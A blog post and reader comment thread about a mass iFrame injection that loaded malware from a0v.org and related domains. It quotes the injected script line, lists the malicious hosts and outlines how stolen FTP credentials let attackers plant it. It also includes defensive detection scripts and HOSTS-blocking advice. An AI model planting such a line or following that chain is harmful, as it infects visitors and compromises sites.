
ScanSafe raises alarm about thousands of compromised Web pages

ScanSafe has determined that untold thousands of Web sites are hosting malicious code, just waiting to infect the computers of unsuspecting Web surfers.

ScanSafe is an acclaimed provider of Software as a Service (SaaS) Web security. I try to pay attention to their STAT Blog; it usually contains worthwhile information. Today was no exception, as foretold by the blog post's title: Up to 55K Compromised by Potent Backdoor/Data Theft Cocktail.

Infamous iFrame

ScanSafe's Mary Landesman, author of the ominous-sounding post, somehow found a malicious iFrame embedded in upwards of 55,000 Web sites. That didn't mean much to me until I found out what an iFrame was. According to the Web Design Group, an iFrame is defined as follows:

"The IFRAME element defines an inline frame for the inclusion of external objects including other HTML documents. IFRAME provides similar functionality to OBJECT. One advantage of IFRAME is that it can act as a target for other links."

The last sentence is the one to pay attention to. In this particular case, the injected iFrame includes the following snippet of code:

"script src=http://a0v.org/x.js"

If I understand correctly, that simple snippet will make the Web browser fetch and run the script at http://a0v.org/x.js without the user knowing it.

What happens then

The Web site a0v.org is where the heavy-duty malware is. Once the Web browser is talking to a0v.org, Landesman explains, a slew of malicious code consisting of trojans, backdoors, password stealers, and possibly a downloader will try to install itself on the visiting computer. If the operating system is Windows-based and vulnerable, the malware will successfully install.

Yes, this is yet again a Windows-only issue. Fortunately, all of our computers are up-to-date and have sufficient protection to prevent any malware from taking root. Right?

Check it out

What I find fascinating is that we can repeat Landesman's experiment, easily finding out how many Web pages are currently infected. Enter "script src=http://a0v.org/x.js" in your favorite search engine and check the number of hits.
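If you would rather check a specific page than rely on hit counts, a short script can look for the telltale reference directly. Here is a rough sketch in Python using the requests library; the example URL is only a placeholder, and the signature is the string Landesman reported. Whatever you do, don't browse to a0v.org itself.

# Rough sketch: does a page contain the injected script reference?
# Requires the third-party "requests" library (pip install requests).
import requests

SIGNATURE = "a0v.org/x.js"  # the script source reported by ScanSafe

def page_is_suspect(url):
    """Fetch the page and report whether the known malicious reference appears."""
    response = requests.get(url, timeout=10)
    response.raise_for_status()
    return SIGNATURE in response.text

if __name__ == "__main__":
    # Placeholder URL; substitute a site you are responsible for.
    print(page_is_suspect("http://www.example.com/"))

A hit only tells you the reference is present in the page source; it doesn't tell you how it got there.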

When Landesman first wrote the post, Google search found 54,900 hits. I'm getting 97,200 hits a day later. Some of the sites include feedzilla.com, latindiscover.com, and foodsresourcebank.org. Maybe it's on purpose, but no one is explaining why the number of infected Web pages is growing so fast.

A0v.org is not the only malicious Web destination. Others include ahthja.info, gaehh.info, htsrh.info, car741.info, game163.info, car963.info, and game158.info. Landesman mentions that ahthja.info is the most prolific of the group. You may find the WHOIS record for ahthja.info interesting: notice the unusual registrant and street names. It seems like there is very little vetting going on at this particular registrar.

Catch 22

I am by no means a Web developer. Still, it seems we are going to have this problem until client-side scripting can be run securely. Sure, disabling JavaScript or using an add-on like NoScript solves the problem. That is, until you want to see what doing so has broken on the Web site.

Final thoughts

I have a pretty good idea why so many computers are vulnerable. But, what's going on with Web servers? Are the current Web server exploits so new, only the bad guys know about them? It sure seems like it.

About

Information is my field...Writing is my passion...Coupling the two is my mission.

100 comments
valvestate

Although the article didn't explicitly say that every site visited with scripts forbidden by NoScript was unviewable, the choice of wording sort of implied it. Indeed, most of the 50 or so sites I clicked through to were professional-looking business sites, many for retirement communities, that looked fine with all scripts forbidden. This is how a site should look if the designer is following best practices. Of course there are exceptions, like sites that deal in multimedia and well-known mobo manufacturers that want to limit the ability of people to search their sites, but for the most part a small to medium sized business would want their site to look basically the same with or without scripting.

That said, NoScript was very useful for quickly telling which sites listed by the Google search still had the demon a0v.org script in their page source, without having to view the source. Google spiders don't crawl the internet in real time with every search request (what a bandwidth load that would be), so many of the sites had already removed the script from their pages. By my estimation, of the roughly 250 returns I checked out, only one in thirty still had the subject script in it.

If the problem can be traced to a content management system, one site was generated using Drupal and a few had the look of Drupal sites. CMSs are over my head as of yet, but Drupal, being community-generated software, is my favorite. There is a slight chance that someone slipped a rogue module past the vetting committee.

My last Google search for "script src=http://a0v.org/x.js" returned 345,000 results, but only 371 before the message: "In order to show you the most relevant results, we have omitted some entries very similar to the 371 already displayed. If you like, you can repeat the search with the omitted results included."

agkramos

Michael, I tried sending email to your Kassmet site but it is not recognized. Anyway, I am curious how to avoid these infected sites. What do I need to do, especially since we research a lot online? Thanks. Alex Ramos, Manila, Philippines

Jacky Howe

A quick Google and the result was 8,680 English pages for "script src=http://a0v.org/x.js" from a standard search, and when I clicked on the Web option the result was about 14,700 for "script src=http://a0v.org/x.js". Thanks for the insight and a better understanding of how these exploits work.

kristina_johnson

So can someone explain how this script even gets on these legit websites? I don't understand it...

mich1fla2

I got 153,000 hits on AltaVista.com. WOW!!!

shanepc

Just ran the Google check - 68,700 sites listed

ps.techrep

This article doesn't address irresponsible website operation that allows a site to be modified without administrator or developer detection and approval, opting for self-promotion rather than remediation or prevention.

If entering "script src=http://a0v.org/x.js" in your favorite search engine were a reliable way to locate all sites that are criminally compromised and the perpetrating sites, then why wouldn't Google and other search engine sites automatically report the attack vectors for investigation? Simply because it ISN'T a useful method for detecting malicious activity, because of false positives. The code structure could be, and is, used for legitimate purposes most of the time. The reason its abuse causes harm is a combination of inadequate website and browser security. Further, a legitimate use of the JavaScript snippet could be compromised by DNS poisoning and site redirection.

If there is a security failure here, it is mainly due to site operator negligence and an unfounded assumption by web browser developers and publishers that end-users are security astute. It isn't enough that browser plug-ins like NoScript can detect and block ALL JavaScript on a site-by-site, page-by-page basis and other plug-ins warn about or stop connections to blacklisted sites. This type of functionality needs to be incorporated by default in web browsers, regardless of the user-perceived inconvenience. It's long past the time for user convenience to be used as the rationale for internet insecurity.

Lack of security standards and poor website design and operation are the responsibility of the developers and publishers of web software and the operators of websites. It's unconscionable to try to make it a web user's responsibility to compensate for a lack of basic web security, but it seems that only when the majority of users are inconvenienced by the inadequate security measures of website operators will the political pressure on site operators increase to the point where security is the FUNDAMENTAL BASIS of website design and operation, rather than an afterthought. This kind of alarmist, after-the-attack investigation that lacks steps for remediation and prevention is bad journalism.

genesane

I just ran it on Google and got 89,000 hits... Bing brought 18,500... But I didn't see a0v.org, or any of those *.info sites. Well, at least, not on the first 7 pages. But the variety of sites that have it is amazing...

kenmarcus

From what I have seen, the exploits are just FTPed to the sites. So a computer is infected, the FTP login info is stolen; the malware is uploaded to the site. Ken

Michael Kassner

As I mentioned earlier, Giorgio's work is amazing and I'm sure has saved me all sorts of clean up.

Michael Kassner

Nice to meet you. If you want, you can message me at any time. Are you referring to a network or a few computers? First and foremost, make sure your computers are up-to-date. Use Microsoft Baseline Security Analyzer or Secunia PSI to make sure. What Web browser are you using? I would suggest using Firefox 3.5.1 with the Perspectives and NoScript add-ons. Just Google my name and the add-on to get to articles where I go into more detail about each add-on. I hope that helps.

Michael Kassner

Both you and Deadly Ernest have had significantly fewer hits than anyone else. You both live in Australia as well. I wonder what, if anything, that has to do with it. Any ideas?

Michael Kassner

I apologize for not making that clear in the post. There are a few methods being used by the bad guys at this time. Web servers have operating system vulnerabilities just like any other computer. Web servers also run Web hosting programs with vulnerabilities. These vulnerabilities can be used to compromise the Web server and get the script installed: http://www.securityfocus.com/infocus/1864

Another method that is popular right now is stealing the FTP credentials to the Web server. The process goes like this:

1. Attackers target a Web developer's computer with some kind of malware that incorporates key loggers and a phone-home application.
2. Once installed, the malware records the OS and FTP login information when the Web developer attempts to log into the Web server. The malware then sends this information back to the attacker.
3. The attacker can then FTP into the Web server and install the script.

The article link is a year old, but the process is explained quite well: http://www.scmagazineus.com/Researcher-finds-server-with-stolen-FTP-credentials/article/118756/

Neon Samurai

- Poor server security practices
- Included advertising panels
- Spoofed website or DNS
- Network traffic injection

Some of these are pretty far out there, and I'm sure I'm missing even more ways to get one's data onto a website or make it appear to be part of it. I also don't know that these specific sites have been modified or spoofed; these are just a few random guesses at how it could be done.

mich1fla2

I found 153,000 hits on AltaVista.com WOW!!!

JCitizen

even banks purposely dumb their web-security down out of concern the client won't be able to access the account. They actually made a conscious decision to take the hit for fraud, as a cost of business!! Afraid they'd lose business to another bank with equally lax online security! I don't think we get enough articles on this all over the web. Bank managers will not read SANS, but might TechRepublic.

cuvo

My feelings about central blacklists are a little mixed. I see two major weaknesses, which could enable harm, too.

- Providing such services can be a very effective way to profile users, even revealing information about the weaknesses of the systems they use. Such profiles can be very helpful to censors as well, so the mechanisms that keep the server's personal information safe must be worked out quite comprehensively, or such tools will become favorite instruments for dictators, blackmailers, crackers, or web marketeers "without brakes".
- The verification mechanisms used to blame an address must be quite thorough. I remember a former colleague's attempts to use blacklist services against spammers; the company was unable to receive mail from any major mail service provider in Germany for weeks. And I am sure that falsely denouncing sites will be one of the favorite games of real saboteurs and blackmailers, as well as script kiddies.

Michael Kassner

I'm sorry if you feel that way, but I don't see that. I also appreciate your insight into the situation. I also mentioned that I'm not a Web developer, thus asked: "I have a pretty good idea why so many computers are vulnerable. But, what's going on with Web servers? Are the current Web server exploits so new, only the bad guys know about them? It sure seems like it." The attack is not by any means over. I felt compelled to warn members of a new attack vector and hinted at making sure operating systems and applications were up-to-date as that is the best protection at this time.

Michael Kassner

A0v.org is the site that compromised computers link to in order to download a malware payload. I suspect that the known exploit domain names are pulled by now. It turns into a cat-and-mouse game as security people try to keep up with the bad guys. That's why I posted the WHOIS record. It's that easy for the nasty types to get new domains.

cuvo

I do not know a lot of FTP servers that are really secured comprehensively against simple brute force attacks. Often you can type in wrong passwords, one after another, hundreds of times without being blocked at all. FTP does not encrypt transmitted passwords, so I do wonder why so few people are thinking about avoiding it anyway. But I do not know if that is the only problem.

Some weeks ago, I was talking to a hosting provider. He told me it is quite a problem for his business to keep some customers from reconfiguring their servers to lower security settings, allowing them to run older software or software developed in an isolated lab without the settings against code injection (e.g. in Apache) that have been common for years. I had a similar problem, too. Our marketing department had a new internet presentation of our company developed by a student. He used a XAMPP environment, where it worked. It was hard work to keep our senior management from forcing me to make it run in the online environment by adapting exactly these settings. And some marketing managers still do not want to understand why I made them spend additional manpower and money on the site's code itself.

manwe

FTP logs can be revealing. Many attacks I see are directed at 'Administrator'. Naturally, I don't have an Administrator FTP account. Others are based on alphabetical lists of names. Probing can go on for hours. Server logs are also helpful. The web design tools people use are convenient, but can make their server vulnerable. I see probing for phpMyAdmin in my logs. I don't use that tool. Instead I have a spoof phpMyAdmin written in PHP to capture the attack. I may automate an abuse report. Whether I do or not depends on the accuracy of the IP address captured in my trap. I am now collecting IPs using multiple methods to determine the most accurate approach. I also use non-standard path names to prevent automated probing attacks. Downloading and installing software packages will give you paths that others already know and can exploit. Logs can provide a warning about software that may be vulnerable.
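As a rough sketch of that kind of log check, something like the following Python works; the log path and the "FAIL" marker are assumptions, since every FTP server formats its log differently.

# Rough sketch: tally failed FTP logins per source IP from a plain-text log.
# LOG_PATH and the "FAIL" marker are assumptions; adjust for your server's format.
import re
from collections import Counter

LOG_PATH = "/var/log/vsftpd.log"   # hypothetical location
IP_PATTERN = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3})")

failures = Counter()
with open(LOG_PATH) as log:
    for line in log:
        if "FAIL" in line.upper():
            match = IP_PATTERN.search(line)
            if match:
                failures[match.group(1)] += 1

# The ten most persistent sources; long streaks suggest brute-force probing.
for ip, count in failures.most_common(10):
    print(ip, count)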

traef

Yes, many of the recent iframe injections are the result of compromised FTP credentials, but these mostly affect .asp and .aspx pages, which are dynamically generated, thereby leading to the belief that they're SQL injections rather than compromised FTP credentials.

edthered

A friend's site got hit because they gave their FTP info to someone so that that person could transfer files in; then that person's computer was compromised at another site, and my friend's FTP info was in the hands of the bad guys. Granted, they shouldn't have been giving the FTP info out, but they, like so many others, didn't know any better.

Ocie3

I added 127.0.0.1 http://a0v.org/x.js to HOSTS. [b](DO NOT select that link in this post unless you are prepared for deep trouble.)[/b] Firefox WOT raises a red screen warning like I've never seen before! a0v.org is the "intermediary site" which downloads malware from several others whose domains are listed in the ScanSafe STAT Blog entry. It probably would be a good idea to add them to HOSTS as well, because we never know what the next intermediary site will be (or whether there are other contemporary intermediaries), and we don't want to admit anything from those other websites, which might be longer-lived.

Seanferd suggests that we use a non-existent IP address instead of 127.0.0.1 in HOSTS. Giorgio Maone (the developer of NoScript) has stated that any IP address which ends in zero is "invalid", so he suggests using 255.255.255.0. However, with respect to IANA's RFC 3330, I cannot find any IP address that could actually be used "safely" for that purpose, insofar as the document apparently does not recognize that an IP address ending in zero is "invalid". "Not assigned" by IANA is not necessarily the same as "not in use". There is a risk that any IP address which is currently in a range that is "not assigned" is now, or will be in the future, "in use".

By the way, the HOSTS file that is available from MVPS.ORG was last updated on July 27, 2009, according to the download page for the HOSTS file on their website. I download their HOSTS file about once a month (if it has been updated), and add some content from another file that I maintain.

seanferd

Pointing at the loopback is not always a good idea.

Michael Kassner

Except that it would require millions of computers to have that done. I'm not sure that's possible, since it's hard to get people to update the operating system.

brenthaskell

As an IT student I spend a lot of time trolling through the internet reading a lot of information. I just want to thank the publisher of this story and everyone who has given such insightful and varied responses and shared their experiences. I have learnt a lot from you all that I hope will stay with me for a long time.

Jacky Howe

Google functions differently depending on your location. OldER Mycroft and I did a search for something with Google not that long ago, and we noticed that we both came up with different results.

Neon Samurai

I was just updating my banking ID the other day and was reminded that the online access password is "maximum" eight characters. Sure, a login attempt limit may keep the bank site safe but eight char password hash doesn't take much time to break if one sucks it out of the network traffic. Given the password limitations, assuming weaker SSL cert and version usage isn't a far stretch.
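Some back-of-the-envelope arithmetic makes the point; the 95-character set and the guess rates below are illustrative assumptions, not measurements of any particular bank.

# How big is an 8-character keyspace, and how long to exhaust it offline?
# Character-set size and guess rates are illustrative assumptions only.
keyspace = 95 ** 8  # 95 printable ASCII characters, 8 positions
for label, guesses_per_second in [("single CPU", 1e7), ("GPU rig", 1e10)]:
    days = keyspace / guesses_per_second / 86400
    print(label, "~", round(days, 1), "days to exhaust the keyspace")

Against a fast, unsalted hash pulled off the wire, the short maximum length is doing most of the damage.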

Michael Kassner

I had to work very hard to remove a company from a list. Then after all was said and done, they were on probation for several months. Not really sure what that meant, but I didn't want to find out.

bboyd

Want to stop a major website from operating correctly? Spoof attacks originating from it for a while. I like whitelists... Use of NoScript and a personal black/whitelist makes sure that external site references don't work unless I explicitly allow them. A blacklist HOSTS file would have to be constantly updated. Now, I admit there is a vulnerability: if the primary white-listed site has been violated to gain this much access, why not just host the malware directly...

ps.techrep

The vector isn't new, merely a new attack variant using known security flaws. If you want to "warn the community", suggest they subscribe to the SANS alert bulletins - and that they READ them.

Michael Kassner

I didn't think of that at all. That has to be a real problem for many Web hosts. Both running weak code and lower security. Thanks for sharing.

Michael Kassner

Experienced any exploit attempts? I would love to hear about them.

seanferd

a0v.org. You don't want the protocol in front of that in HOSTS anyway. May as well drop the directory, as that doesn't resolve in DNS either.

JCitizen

remembers this hack from many years ago; I'd lost track of it. This must have been the one TR featured a couple of years ago; the install method looks familiar for XP (I assume). Have you taken any performance hit from using it? On my laptop, I have one similar to ABP, but it is for IE 7 on XP. It updated automatically and starts out a lot like AdBlock Plus, where it gives you a one-time question to pick your server choice; except after that you never see it again, as it runs in the background. At least I assume it updated, as I did have to pick an update server and language. Perhaps this is one and the same, only they dropped the auto update. I don't use my laptop much anymore, so won't be able to check on it until much later.

Michael Kassner

Why is that? I think I know, but would appreciate your opinion.

mmatchen

Also works, and includes a SafeSearch feature which uses RegEx to enforce that searches on major search engines stay filtered: www.getk9.com

Michael Kassner

Still that means their black list has to be darn near real-time to keep up with the number of Web sites that are exploited.

stux

...as part of its system immunizations. It would then be a matter of educating the public to use this as an important security tool (as well as update the immunizations frequently). It'd be nice if its updates were automatic but it's freeware; what more can you ask? I also don't bother installing their 'TeaTimer' resident protection since I find it too annoying (as in Vista UAC annoying) despite its potential usefulness. Unfortunately, education of safe security and computing practices is probably one of the biggest hurdles in securing the internet. http://en.wikipedia.org/wiki/Spybot_-_Search_%26_Destroy

Michael Kassner

Did you read "The 10 faces of malware"? It may be of help as well. Good luck in your studies.

Michael Kassner

Think it's set up using your IP address? I wonder why it would matter, actually.

Jacky Howe

the location tag that it uses: Google.com, Google.com.au, Google.co.uk. Other than that I'm at a loss.

Michael Kassner

Now, I am curious. Why would Google be location sensitive?

JCitizen

Well, any improvement, no matter how slight, is something, I guess. I wouldn't blame anyone for leaving an institution if it had bad security enforcement. Mine is giving me too good a deal to quit, but they seem to have pretty good security. It was very difficult to set up; I imagine they don't get many customers using it. I know I check all the sites I frequent with networking4all.com to see how the SSL looks. It usually points out some improper maintenance or just poor quality site security. I've had a few web-masters thank me for pointing the evaluation out. On the rest, I like Comodo Verification Engine for a quick check. The newest version seems to work well now with the updated FF and IE 8 32-bit.

Michael Kassner

New attack vector versus new attack variant. OK. I get SANS reports daily, along with their tweets. Unless I have missed it, this "variant" hasn't been mentioned.

JCitizen

I have a bad habit of thinking people will understand what I mean by magical osmosis! I picked that up from my Dad's genome apparently. :(

seanferd

Do you mean a HOSTS file, or the blacklist host files for ABP?

JCitizen

of ABP for Firefox, but I use two host files (that I'm aware of) and I've never seen better performance! Perhaps AdBlock Plus does housecleaning on their file occasionally to keep it trimmed up? I know Spybot was getting terribly bloated and slow, and using the immunization feature would probably break every time you did one of the many IE 8 updates that have come down the pike, including IE 8.

seanferd

That's a rather good chunk of information.

Ocie3

The loopback interface (IP address 127.0.0.1, [i]localhost[/i]) is reportedly now obsolete -- which is the reason that some people have decided to use it for their own particular purpose, such as assigning it to a server on their LAN (?). If it is not being used for another purpose on your computer and your LAN, then there is no particular reason not to use it in HOSTS.

That said, using 127.0.0.1 in HOSTS came up in the context of a Firefox NoScript bug. A lively discussion about it is at: http://hackademix.net/2009/07/01/abe-warnings-everywhere-omg/ One contributor mentioned that using an IP address other than 127.0.0.1 can lead to waiting for a response from the supposed host that has been assigned the alternative IP address until the wait "times out". Using 127.0.0.1 is an immediate "dead end". However, Giorgio Maone stated that any IP address which ends in zero is "invalid" and he suggested that 255.255.255.0 can be used instead of 127.0.0.1. A browser should recognize that an IP address ending in zero is invalid when such an address is returned by Windows from the HOSTS file. Presumably, the browser simply should not attempt to connect to anything that has an invalid IP address. One contributor stated that using 0.0.0.0 was actually about 100 times faster for Firefox performance than using 127.0.0.1.

In the RFC 3330 document that I read, IANA does not recognize any IP address(es) as "invalid", and those ending in zero are (if memory serves) included in the various IP address ranges that they have assigned for use. Unfortunately, "reserved" and "not assigned" by IANA is not the same as "not in use" -- including 255.255.255.0 - 255.255.255.255, or 0.0.0.0 (which I see as an endpoint for many connections in NETSTAT output). As far as I can determine, there is a risk that any IP address which is currently in a range that is "not assigned" is now, or will be in the future, "in use" -- unless we can get IANA to designate some IP address as a safe "null" endpoint. Maybe we should ask the experts at IANA to suggest one to use instead of 127.0.0.1 :-).

Last, but not least, according to Blocking Unwanted Parasites With a HOSTS File (http://www.mvps.org/winhelp2002/hosts.htm), a HOSTS file larger than 135 KB can slow down Windows 2000/XP/Vista. Just how much Windows is "slowed down" is not disclosed. They offer a workaround that might not be acceptable on a corporate LAN, or even, in principle, on your home computer(s) and LAN.
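For what it's worth, a quick way to see which address a blocked hostname actually resolves to on a given machine is to ask the OS resolver, which consults the HOSTS file before DNS. A minimal Python sketch:

# Minimal check: what does this machine's resolver return for a host?
# If a HOSTS entry is in effect, the blocking address (e.g. 127.0.0.1) comes back.
import socket

for host in ["a0v.org", "www.example.com"]:
    try:
        print(host, "->", socket.gethostbyname(host))
    except socket.gaierror as error:
        print(host, "-> lookup failed:", error)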

seanferd

but I'm sure I had learned there were others: Some software actually uses the local host/loopback interface, so with a few HOSTS entries that are used a lot (say, for blocking ads), this usage may cause problems for that software, and maybe the OS. If you have other reasons in mind, I'd appreciate reading them. But the other thing is, large HOSTS files can bog down the OS and network performance. (Which is an entirely separate thing from using 127.0.0.1 instead of 255.255.255.0 or something.)

mmatchen

I thoroughly enjoy reading your investigative articles into the various forms of malware and other security FYI's you provide. I've found them quite helpful! Glad I was able to offer a meager contribution...

Michael Kassner

I appreciate your mentioning Blue Coat. I wasn't aware of that, but will check it out now.

seanferd

They were part of the project to block potential Conficker domains, plus they block a little bit of other malware domains.

JCitizen

utility is finally kaput (obsolete). Although I still miss Tea Timer, I've been getting better performance out of the free Ad-Aware Anniversary Edition, with Ad-Watch enabled. You don't get the registry protection, but MBAM cleans the registry pretty well if anything tries to remain resident. I used to use A-squared to clean traces like that, but it quit updating on x64 Vista, so I switched to SUPERAntiSpyware as a cleanup agent and deep malware scanner. I only run it when I suspect foul play after running other more efficient products. I was using Ad-Aware Plus to double-check NIS 2009, because I didn't trust the AV capabilities of Norton yet. But I've had it for nearly a year now and no viruses! So when Plus expires, I will probably revert back to AAE mode, and I may uninstall it. I only recommend it to folks that can't afford the one-time license fee for MBAM. I will need a registry protector when AA+ runs out, as that was the only thing on Ad-Watch I was using. That way it didn't conflict with NIS 2009. I'm sure there are excellent stand-alone registry utilities that could replace Tea Timer - probably ones that have been around a long time.

Michael Kassner

Not sure why, but I'm not a fan of altering the Hosts file for clients. If there was a more automated and nimble method, I might though.

Ocie3

is not quite the same as an anti-malware scanner using a "definitions" file, but you are right that at least some of the content of HOSTS is likely to become outdated. Accordingly, HOSTS is probably best used to block access to websites that are likely to continue in operation indefinitely (such as gambling and pornography websites that you don't want your children to visit). Eventually some URLs will be for websites that no longer exist, and there are plenty of websites that criminals use which are not likely to have their URL in HOSTS. After all, didn't NSS report 12,000 websites that had hyperlinks, each of which would cause a process to be launched that would lead to the installation of malware?? I haven't seen a HOSTS file with that many entries yet, but their database might make an interesting one! On the other hand, I don't think that we need to add the URLs for 55,000 website pages -- as reported by ScanSafe -- to HOSTS. We only need to add the URLs of the sites from which the malware is obtained, including the "intermediary" site(s) that actually do the work. (The situation is probably the same with respect to the NSS websites as well.) Spybot Search and Destroy is the only security software of which I know that actually writes a very long list into HOSTS, again, to block access primarily to websites that pander to vices such as gambling and pornography. However, I do not know how often Spybot replaces the contents of HOSTS; I haven't used Spybot S&D since June 2008.

Dr Dij

There are a number of services that will scan your website for changes and/or malicious code and notify you. They are not expensive.
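A do-it-yourself version of the same idea is not hard, either. Here is a rough sketch in Python that hashes every file under a web root and flags anything that differs from a saved baseline; the web root path and baseline file name are assumptions.

# Rough sketch: flag changed, new, or missing files under a web root by
# comparing SHA-256 hashes against a previously saved baseline.
import hashlib, json, os

WEB_ROOT = "/var/www/html"          # hypothetical web root
BASELINE = "site_baseline.json"     # where the known-good hashes are kept

def snapshot(root):
    """Return a {path: sha256} map for every file under root."""
    hashes = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                hashes[path] = hashlib.sha256(fh.read()).hexdigest()
    return hashes

current = snapshot(WEB_ROOT)
if not os.path.exists(BASELINE):
    # First run: record the known-good state and stop.
    with open(BASELINE, "w") as fh:
        json.dump(current, fh)
    print("Baseline saved; run again later to check for changes.")
else:
    with open(BASELINE) as fh:
        baseline = json.load(fh)
    for path in sorted(set(current) | set(baseline)):
        if current.get(path) != baseline.get(path):
            print("changed, new, or missing:", path)

Re-save the baseline only after verifying that a reported change was one you made on purpose.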

Michael Kassner

I am excited about heuristics, yet I see way too many false-positives right now.

Michael Kassner

But, in the meantime, wouldn't it be smart for Web hosting professionals at least to keep their servers up to date and run scans? If I were hosting for hire, I would be too worried about my reputation not to.

TheSwabbie

Basic security in the virtual world with a virtual .45 colt.. But how would I get it to kill them? LOL

ps.techrep

You should investigate the capabilities of products from eEye and others that aren't based on signatures for their primary defense strategy.

ps.techrep

The very idea that a user or site operator would need to manually initiate security scans to detect attacks after the fact is absurd. It's like expecting home-owners to periodically search their houses for intruders and damage instead of having the doors and windows locked and constantly being alert to intrusions. When will the software community start providing the same basic security in the virtual world that the physical community has had for thousands of years?

Michael Kassner

It seems to be bouncing around quite a bit. Also geographical location appears to matter. I find that strange, unless Google search patterns are not the same everywhere.

Michael Kassner

It is the same. The signature files for the application will always lag behind. This malware is rather sophisticated as well, morphing all the time to stay ahead. The best bet is to keep everything up to date.

Wick Tech

Education also seems to have a limited shelf life. There's always something "more important to do". "Oh, yeah, I meant to run the check, but I had to finish this project first. And then a new project came up, and I just didn't have time, even though I know it's important." It's just like saving your work... you don't really realize how important it is until you lose that 10-page document or 200-cell spreadsheet. (And in a separate thought) I got about 70,000 hits on my Google search.
